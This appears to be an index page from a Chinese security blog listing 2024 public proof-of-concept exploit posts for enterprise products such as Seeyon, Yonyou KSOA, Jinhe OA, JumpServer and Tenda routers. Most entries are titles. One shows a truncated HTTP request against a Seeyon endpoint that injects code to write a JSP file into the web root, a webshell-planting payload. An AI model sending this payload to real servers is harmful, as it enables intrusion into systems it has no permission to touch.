2024你懂的 第6页
2024攻防互联网公开POC
致远在野constDef接囗存在代码执行漏洞_秃兔安全

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...
秃兔的头像_秃兔安全至尊玉兔秃兔6个月前
07713
JumpServer(CVE-2024-29202)Jinin2模板注入漏洞_秃兔安全
KubePi存在JWT token验证绕过漏洞_秃兔安全
云课网校系统uploadImage存在任意文件上传漏洞_秃兔安全
金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞_秃兔安全
H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞_秃兔安全
金和OA_SAP_B1Config.aspx未授权访问漏洞_秃兔安全
云时空商业ERP文件上传_秃兔安全
用友时空KSOA系统接口五处存在SQL注入漏洞_秃兔安全

用友时空KSOA系统接口五处存在SQL注入漏洞

用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞 用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞 用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞 用友时空KSOA系统接口PrintZPZP.jsp存...
秃兔的头像_秃兔安全至尊玉兔秃兔6个月前
07212
Tenda FH1201 v1.2.0.14接口exeCommand存在远程命令执行漏洞(CVE-2024-41468)_秃兔安全